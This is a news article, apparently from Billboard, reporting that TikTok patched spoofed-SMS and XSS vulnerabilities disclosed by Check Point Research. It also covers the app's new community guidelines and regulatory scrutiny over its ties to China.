TikTok Addresses 'Multiple' Security Flaws Found by Cyber Intelligence Firm

Thomas Trutschel/Getty Images

The video-sharing app has also issued new community guidelines for its users.

In what is seemingly the latest effort to allay concerns over its security vulnerabilities, the hugely popular video-sharing app TikTok has revealed new measures to ensure the safety of its users.

According to a Wednesday (Jan. 8) press release, the company has patched up “multiple” heretofore-unknown security flaws that were discovered on its platform by Check Point Research, the threat intelligence arm of cyber security firm Check Point Software Technologies. Research carried out by the firm found that these flaws allowed bad actors the opportunity to send spoofed SMS messages to TikTok users containing malicious links; if clicked on, attackers would have the ability to manipulate user accounts, making private videos public and even uploading unauthorized content.

Check Point's research additionally revealed that the company's TikTok Ads subdomain was vulnerable to a type of attack known as XSS, in which malicious scripts are added to trusted websites in order to give hackers access to users’ confidential personal information, including email addresses and birth dates.

The press release notes that since Check Point first made TikTok aware of these vulnerabilities, the company has “responsibly deployed” a fix to keep user accounts safe.

“TikTok is committed to protecting user data,” TikTok security engineer Luke Deshotels said in a statement. “Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us. Before public disclosure, CheckPoint agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers.”

“Data is pervasive but data breaches are becoming an epidemic, and our latest research shows that the most popular apps are still at risk,” added Oded Vanunu, Check Point’s head of product vulnerability research. “Social media applications are highly targeted for vulnerabilities as they provide a good source for private data and offer a good attack surface gate. Malicious actors are spending large amounts of money and putting in great effort to penetrate into such huge applications. Yet most users are under the assumption that they are protected by the app they are using.”

Also revealed Wednesday were extensive new community guidelines for TikTok users laying out what constitutes acceptable content on the platform. Among other things, the latest guidelines ban terrorist and hate groups; “violent and graphic” content; hate speech; harassment and bullying; pornography; predatory or grooming behavior toward minors; the trafficking of drugs and firearms; fraud; and blackmail. (TikTok tells Billboard the new guidelines are unrelated to the Check Point study.) 

According to the updated guidelines, TikTok will remove content it finds to be in violation and suspend or ban accounts involved in severe or repeated violations, while also reporting users to legal authorities “under certain circumstances.” It additionally lists exceptions for content that, while it would ordinarily be removed, “could have value to the public.”

TikTok has been weathering multiple controversies over the last several months, including scrutiny over its parent company ByteDance’s relationship with the Communist Party-run Chinese government. The app is now reportedly the subject of an inquiry by the Interagency Committee on Foreign Investment in the U.S. (CFIUS) over its 2017 acquisition of the U.S.-based video-sharing app Musical.ly, which was folded into TikTok in August 2018.

In a statement sent to Billboard at the time the inquiry was reported, a TikTok spokeperson responded, “While we cannot comment on ongoing regulatory processes, TikTok has made clear that we have no higher priority than earning the trust of users and regulators in the US. Part of that effort includes working with Congress and we are committed to doing so.”

Last week, TikTok released its first-ever transparency report, listing requests it had received from foreign countries for user data and content removal in the first six months of 2019. The move was widely seen as a way for the company to combat suspicions around its alleged relationship with China, which some have suspected of censoring TikTok content related to pro-democracy protests in Hong Kong (China appeared nowhere in the report). In October, TikTok denied that China held any sway over its platform, stating, "We have never been asked by the Chinese government to remove any content and we would not do so if asked. Period."

TikTok currently boasts over one billion users worldwide and is available in over 150 markets and 75 languages.


The Biz premium subscriber content has moved to Billboard.com/business.

To simplify subscriber access, we have temporarily disabled the password requirement.